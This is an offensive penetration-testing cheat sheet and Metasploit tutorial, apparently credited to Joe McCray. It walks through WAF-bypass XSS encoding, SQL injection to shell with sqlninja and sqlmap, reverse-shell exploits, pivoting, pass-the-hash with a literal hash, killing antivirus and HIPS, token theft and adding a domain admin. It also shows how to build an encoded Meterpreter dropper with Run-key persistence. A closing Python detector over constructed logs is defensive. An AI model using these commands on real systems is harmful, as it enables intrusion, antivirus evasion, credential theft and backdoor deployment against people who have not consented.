========== Metasploit ==========

Install Metasploit
------------------
The Metasploit Framework is well-supported on the Ubuntu platform. The following instructions should also apply to Kubuntu, Xubuntu, and Debian. In most cases you should use the official binary installers, described in the Generic Linux instructions. If for some reason the installer does not work for you, the following instructions should get you up and running.

Dependencies

Install the Ruby dependencies:
$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

Install the Subversion client:
$ sudo apt-get install subversion

In order to build the native extensions (pcaprub, lorcon2, etc.), the following packages need to be installed:
$ sudo apt-get install build-essential ruby-dev libpcap-dev

Metasploit Framework

Once the dependencies have been installed, download the Unix tarball from the download page and run the following commands, or follow the steps below.

Installing Metasploit Framework on Ubuntu

Recently, I had to install Metasploit Framework on Ubuntu. I thought I would document the instructions here. Be sure to check the downloads page on the Metasploit website (http://www.metasploit.com) to get the current version. At the time of this blog the latest version was 3.5.0.

$ wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2
$ bunzip2 framework-3.5.0.tar.bz2
$ tar xvf framework-3.5.0.tar
$ sudo mkdir -p /opt/metasploit3
$ sudo cp -a msf3/ /opt/metasploit3/msf3
$ sudo chown root:root -R /opt/metasploit3/msf3
$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
$ sudo svn update /opt/metasploit3/msf3/
$ sudo crontab -e -u root
# enter the line below (the path must match the install directory used above)
1 * * * * /usr/bin/svn update /opt/metasploit3/msf3/ >> /var/log/msf3update.log 2>&1

When you've completed this step, you should have a working installation and be able to run modules, pivot through compromised systems, and use most of the Metasploit Framework's features.
The following optional installation steps will give you extra functionality.

Database Configuration (optional)

Now that the framework is installed, you'll want to configure a database connection and enable the Metasploit Framework to connect to it:
* For postgres, see postgres_setup (recommended)
* For mysql, see mysql_setup

Extensions (optional)

The Metasploit Framework includes a few native Ruby extensions that must be compiled in order to use certain types of modules.

To enable raw socket modules:
$ sudo apt-get install libpcap-dev
$ sudo bash
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install

To enable WiFi modules:
$ sudo bash
# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

Updates

The Metasploit Framework is updated daily with the latest exploits, payloads, features, and bug fixes. To update your installation of the Metasploit Framework:
$ sudo svn update /opt/metasploit3/msf3/

This can also be installed into the root user's crontab:
$ sudo crontab -e -u root
# enter the line below
1 * * * * /usr/bin/svn update /opt/metasploit3/msf3/ >> /var/log/msfupdate.log 2>&1

Identifying Load Balancers (Active Reconnaissance)
--------------------------------------------------
Most load balancers are deployed for redundancy and performance improvement. As an attacker, load balancers are a headache: you have no idea where your packets are going. There is absolutely no point in running tools against a host without knowing whether a load balancer has been deployed. So if one time it shows IIS 6 and the next time you load it it shows IIS 7, it might be load balanced, brother...

Step 1 is to determine whether the host is load balanced.
Step 2 is to determine what type of load balancing is in place (HTTP or DNS).

How can you tell if the target host is behind a load balancer?
Firefox LiveHTTP Headers - https://addons.mozilla.org/en-US/firefox/addon/3829
Look in the HTTP headers for modifications such as:
1. BIGipServerOS in cookie
2. nnCoection: close
3. Cneonction: close

dig
* Look for multiple addresses resolving to one domain name
* dig google.com

My favourite is Netcraft.com.

Identifying Intrusion Prevention Systems
----------------------------------------
How can you tell if the target host is protected by an Intrusion Prevention System?

Curl: the netcat of the web app world - http://curl.haxx.se/
curl -i http://www.targetcompany.com/../../WINNT/system32/cmd.exe?d
curl -i http://www.targetcompany.com/type+c:\winnt\repair\sam._
Look for RSTs and no response... tcpdump/wireshark is your friend ;-)

Active Filter Detection - http://www.purehacking.com/afd/downloads.php
osstmm-afd -P HTTP -t targetcompany.com -v

Ok, so you're up against an IPS. Relax, there are a few other things to consider.

HINT: Most IDS/IPS solutions don't monitor SSL-encrypted (actually, any encrypted) traffic. Because your attack passes through as encrypted traffic (for example, an injected SQL query), the IDS doesn't see it; as said, an IDS only inspects plaintext traffic. To detect suspicious traffic inside SSL you need to decrypt it with an SSL accelerator placed in front of the IDS. The latest IDS products can inspect encrypted traffic too, but they are more expensive. I don't know why people pay for an IPS and then run it in IDS mode. Sheesh, hey dumbass, turn on IPS and let's block some traffic. SSL accelerators are expensive, so not everyone has one.

Identifying Web Application Firewalls
-------------------------------------
How can you determine if the target host has deployed a WAF?
* https://addons.mozilla.org/en-US/firefox/addon/3829
* Look in the HTTP headers for modifications such as:
1. Cookie value has WAF info in it
   - BIGipServerwww.google.com_pool_http
   - barra_counter_session
   - WODSESSION
2. Different server response code for a hostile request
   - 501 Method Not Implemented: this error indicates that the target has probably deployed a web application firewall (WAF)
3. Different "Server" response when a hostile packet is sent

WAFs are surprisingly easy to detect?
-------------------------------------
Generally you just have to send one valid request and one malicious request and diff the responses. "Malicious" tends to be any HTTP request whose payload contains things like: ' " < ? # - | ^ *

Bypassing Web Application Firewalls
-----------------------------------
How can you determine if the target host has deployed a WAF?
http://packetstormsecurity.org/web/unicode-fun.txt

[j0e@LinuxLaptop toolz]$ ruby unicode-fun.rb
Enter string to URL Unicode:<script>alert('XSS')</script>
%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%uff54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff52%uff49%uff50%uff54%u003e

Curl
curl -i http://www.targetcompany.com/3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e
HTTP/1.1 404 Not Found
Date: Sat, 14 Mar 2009 19:13:10 GMT
Server: Apache

SQL Injection to Metasploit (SQLNinja)
--------------------------------------
cd /home/beatdown/toolz/sqlninja-0.2.3/
vi sqlninja.beatdown.conf
  host = [target ip]
  page = /vuln/vulnpage.asp
  stringstart = VulnID=10;
  lhost = [your ip]
  device = eth0
  msfpath = /home/beatdown/toolz/metasploit
  resolvedip = [your ip]
./sqlninja -m t -f sqlninja.beatdown.conf   (test for injection)
./sqlninja -m f -f sqlninja.beatdown.conf   (fingerprint the backend db)
./sqlninja -m u -f sqlninja.beatdown.conf   (upload dnstun, netcat, or meterpreter)
./sqlninja -m s -f sqlninja.beatdown.conf   (drop a shell)

cd /home/beatdown/toolz/sqlmap-dev
python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-shell -v 1
os-shell>
python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-pwn --msf-path /home/beatdown/toolz/metasploit --priv-esc -v 10
meterpreter>

Getting in via client-side (client side Attack)
-----------------------------------------------
sudo ./msfconsole
Be sure to run as root so you can set the LPORT to 443.
use exploit/[name of newest browser, PDF, ActiveX, or fileformat exploit]
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST [your public ip]
set LPORT 443
exploit -j

Pivoting In Lan Through Web
---------------------------
Pivot Attack: Using a compromised host as a launching point to attack other hosts...

Set up the standard exploit:
exploit
route
ctrl-z   <-- background the session
back     <-- you need to get to the main msf> prompt

Now set up the pivot with a route add:
route add 192.168.10.131 255.255.255.0 1   <-- use the correct session id
route print   <-- verify
use exploit/windows/smb/ms08_067_dcom
set PAYLOAD windows/shell/bind_tcp
set RHOST 192.168.10.132
set LPORT 1234
ctrl-z   <-- background the session
back     <-- you need to get to the main msf> prompt

Run auxiliaries & exploits through your pivot:
use scanner/smb/version
set RHOSTS 192.168.10.1/24
run

Common LAN Security Solutions
-----------------------------
Can't get on the network?
1. No DHCP - static IP addresses
2. DHCP MAC address reservations
3. Port security

Can't get on the network?
1. No DHCP - static IP addresses -> steal a valid IP address from a host
2. DHCP MAC address reservations -> steal a valid MAC address
3. Port security -> steal a valid MAC/IP address

Enumerating The Internal Network Against NIPS/HIPS
--------------------------------------------------
c:\set                                     <-- Use SET to get domain information and username
c:\net view                                <-- Use NET VIEW to get computers in the user's domain and other domains
c:\net view /domain                        <-- Use NET VIEW to get computers in other domains
c:\net user                                <-- Use NET USER to get local users on the computer you are on
c:\net user /domain                        <-- All users in the current user's domain
c:\net localgroup                          <-- Use NET LOCALGROUP to get the local groups on the computer
c:\net localgroup /domain                  <-- Use NET LOCALGROUP to get the domain groups
c:\net localgroup administrators           <-- All users in the local administrators group
c:\net localgroup administrators /domain   <-- All users in the domain administrators group
c:\net group "Company Admins" /domain      <-- All users in the "Company Admins" group
c:\net user "joe.mccray" /domain           <-- All info about this user
c:\nltest /dclist:                         <-- List Domain Controllers...

Basically, browsing the network neighborhood and querying Active Directory will always be considered legitimate traffic by an NIPS, so you can use NET commands to enumerate a network without port scanning.
Looking Around the Network For A User
-------------------------------------
Some commands to identify a logged-in user:
NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"
WMIC /Node:remotecomputer ComputerSystem Get UserName
PSLOGGEDON -L \\remotecomputer
PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "
PSEXEC \\remotecomputer NET NAME
PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"

Smoking some MSF hash: Moving around the network using password hashes
----------------------------------------------------------------------
use exploit/windows/smb/psexec
set RHOST 192.168.10.20
set SMBUser administrator
set SMBPass 01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.10.10
exploit

Killing The HIPS (as SYSTEM with the "at" command)
--------------------------------------------------
1. Stop the overall AV Framework
   net stop "McAfee Framework Service"
2. Stop the HIPS
   net stop hips
   net stop enterceptagent
   net stop firepm
3. McAfee Processes
   pskill -t UdaterUI
   pskill -t TBMon
   pskill -t Mcshield
   pskill -t VsTskMgr
   pskill -t shstat
4. HIPS Processes
   pskill -t firetray

Or get SYSTEM from meterpreter; the latest version of Metasploit does all of this for you within one command.

Stealing a domain administrator's token....
-------------------------------------------
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "domain\\user"
meterpreter> execute -c -H -f cmd -a "/k" -i -t   <--- use -t to run with your impersonated token

or

meterpreter> list_tokens -g
meterpreter> impersonate_token "DOMAIN\\Domain Admins"
meterpreter> execute -c -H -f cmd -a "/k" -i -t   <--- use -t to run with your impersonated token

Add yourself to the Domain Admins group:
c:\net user j0e j0eR0ck$ /domain /add
c:\net localgroup administrators j0e /domain /add
Learn Metasploit client-side attack
This is for educational purposes only
Today I will show you how to create a trojan/dropper for Metasploit and how to backdoor Windows with it.
Here is the method I present to you, but I am not the author of this video:
http://www.securitytube.net/video/3745
Operating systems used:
Backtrack 5 R2 = Attacker (192.168.1.97)
Windows XP SP3
Vulnerable operating systems:
Windows 7 and XP, any version = Slave (192.168.1.7)
Software requirements:
Dev-C++ version 4.9.9.2 (on XP)
The source code from the video.
1 - Create the file ascii.bin
Launch this command in a console on Backtrack:
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.97 LPORT=4444 R|msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X> /root/Desktop/ascii.bin
Then copy ascii.bin to /var/www:
Code:
Pixo@Backtrack 5 R2# cp /root/Desktop/ascii.bin /var/www
2 - Create the trojan/dropper
In Win XP open Dev-C++ and click on File => New => Project.
Select "Empty Project" and name it.
Then create a new source file.
Click on File => Save As, and name it.
Go to
Code:
http://www.el-palomo.com/wp-content/uploads/2012/03/codigoC.txt
Copy and paste the code.
Now replace the IP address with the Backtrack IP address.
Open the project options.
Add a link to wininet with the -lwininet linker option.
So that the console window is not visible, this option is added:
Here you can compile your Trojan/Dropper.
3 - Get a Meterpreter
Start the listener with this command:
Code:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E
You can use any method you want to get a Meterpreter.
You can social-engineer the target and send your dropper.
- To add an icon to your dropper, you can use the method described in this thread.
You can also exploit a vulnerability.
4 - Create the persistent backdoor
(I know the persistence.rb script exists, but I wanted to make a persistent backdoor that is as undetectable by antivirus as possible.)
If you used the method for adding an icon, you can set %windir%\system32 as the extract dir.
If not, you can use Meterpreter to upload your dropper with this command:
Code:
meterpreter> upload /root/exec.exe C:\\Windows\\system32\\
Add a registry entry to launch your dropper at Windows startup:
Code:
meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v exec -d '"c:\windows\system32\exec.exe"'
Check the registry:
Code:
meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
While the target reboots, restart your listener:
Code:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E
You will find that your Meterpreter comes back automatically as soon as a session is opened.
Conclusion
From here you are the master on board.
I hope you enjoy it. I'm always looking for a way to inject shellcode into an image and, if possible, make it undetectable.
You will find links that talk about it in my other tutorial on antivirus evasion methods with Metasploit.
Analysis:
ascii.bin : https://www.virustotal.com/file/3a2976ff...334400026/
exec.exe : https://www.virustotal.com/file/da1ba033...334409609/
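The cheat sheet's point is that NET/nltest enumeration and the net stop/pskill commands against the HIPS look like ordinary Windows traffic to a network IPS, and the tutorial's Run-key entry never touches the network at all, so the place to catch all of them is host telemetry. What follows is an added example, not code from the cheat sheet or the tutorial: a small rule set run over constructed process-creation records (Security event 4688 with command-line auditing, or Sysmon Event ID 1), with made-up hostnames, users and timestamps. Meterpreter's reg setval writes through the registry API rather than reg.exe, so in production the persistence rule would key on a registry-set event (Sysmon Event ID 13) rather than on a command line as modelled here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (timestamp, host, user, command line).
# They replay the cheat sheet's sequence on one workstation; none are real logs.
SAMPLE_EVENTS = [
    ("2012-03-14T09:00:01", "WS042", "CORP\\jdoe", "net view /domain"),
    ("2012-03-14T09:00:04", "WS042", "CORP\\jdoe", "net user /domain"),
    ("2012-03-14T09:00:09", "WS042", "CORP\\jdoe", "net localgroup administrators /domain"),
    ("2012-03-14T09:00:15", "WS042", "CORP\\jdoe", 'net group "Company Admins" /domain'),
    ("2012-03-14T09:00:20", "WS042", "CORP\\jdoe", "nltest /dclist:corp"),
    ("2012-03-14T09:05:30", "WS042", "NT AUTHORITY\\SYSTEM", 'net stop "McAfee Framework Service"'),
    ("2012-03-14T09:05:31", "WS042", "NT AUTHORITY\\SYSTEM", "pskill -t Mcshield"),
    ("2012-03-14T09:06:02", "WS042", "NT AUTHORITY\\SYSTEM",
     'reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v exec /d "c:\\windows\\system32\\exec.exe"'),
    ("2012-03-14T09:06:40", "WS042", "NT AUTHORITY\\SYSTEM", "net localgroup administrators j0e /domain /add"),
    ("2012-03-14T10:15:00", "WS077", "CORP\\helpdesk", "net user bsmith /domain"),  # a lone lookup: benign
]

# Recon commands from the "Enumerating The Internal Network" section.
ENUM_RE = re.compile(r"^(?:net\s+(?:view|user|localgroup|group)\b|nltest\b|nbtstat\b|wmic\b.*\bget\s+username)", re.I)
# Service and process names from the "Killing The HIPS" section (lower-cased for matching).
AV_SERVICES = {"mcafee framework service", "hips", "enterceptagent", "firepm"}
AV_PROCESSES = {"udaterui", "tbmon", "mcshield", "vstskmgr", "shstat", "firetray"}
STOP_RE = re.compile(r'^net\s+stop\s+"?([^"]+?)"?\s*$', re.I)
KILL_RE = re.compile(r"^pskill\b.*?\s([\w.]+)\s*$", re.I)
# Run-key persistence (the reg.exe form of the tutorial's "reg setval ... \Run").
RUNKEY_RE = re.compile(r"^reg\s+(?:add|setval)\b.*currentversion\\+run\b", re.I)
# Account or group membership changes ("net user X Y /domain /add", "net localgroup administrators X /add").
ACCOUNT_RE = re.compile(r"^net\s+(?:user\s+\S+|localgroup\s+\S+\s+\S+|group\s+\S+\s+\S+).*\s/add\b", re.I)


def classify(cmd):
    """Return (category, detail) for one command line, or None if it is uninteresting."""
    m = STOP_RE.match(cmd)
    if m and m.group(1).lower() in AV_SERVICES:
        return ("defense_tampering", "service stopped: " + m.group(1))
    m = KILL_RE.match(cmd)
    if m and m.group(1).lower() in AV_PROCESSES:
        return ("defense_tampering", "process killed: " + m.group(1))
    if RUNKEY_RE.match(cmd):
        return ("persistence", "Run key modified: " + cmd)
    if ACCOUNT_RE.match(cmd):  # checked before ENUM_RE: "net user ... /add" is not a lookup
        return ("account_manipulation", cmd)
    if ENUM_RE.match(cmd):
        return ("enumeration", cmd)
    return None


def analyze(events, window=timedelta(seconds=120), threshold=4):
    """Apply the rules to a list of events. Tampering, persistence and account changes alert
    on a single event; enumeration alerts only as a burst of distinct commands per host."""
    alerts = []
    enum_by_host = defaultdict(list)
    for ts_str, host, user, cmd in sorted(events):
        hit = classify(cmd.strip())
        if hit is None:
            continue
        category, detail = hit
        if category != "enumeration":
            alerts.append((host, user, category, detail))
            continue
        ts = datetime.fromisoformat(ts_str)
        seen = enum_by_host[host]
        seen.append((ts, cmd.strip().lower()))
        recent = {c for t, c in seen if ts - t <= window}
        already = any(a[0] == host and a[2] == "recon_burst" for a in alerts)
        if len(recent) >= threshold and not already:
            alerts.append((host, user, "recon_burst",
                           f"{len(recent)} distinct enumeration commands within {int(window.total_seconds())}s"))
    return alerts


if __name__ == "__main__":
    for host, user, category, detail in analyze(SAMPLE_EVENTS):
        print(f"{host:6} {user:22} {category:20} {detail}")
```

On the constructed sample this raises one recon-burst alert for WS042 at the fourth distinct NET command, two defense-tampering alerts, one persistence alert and one account-manipulation alert, while the single lookup from WS077 stays silent.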
Great Thanks to Joe McCray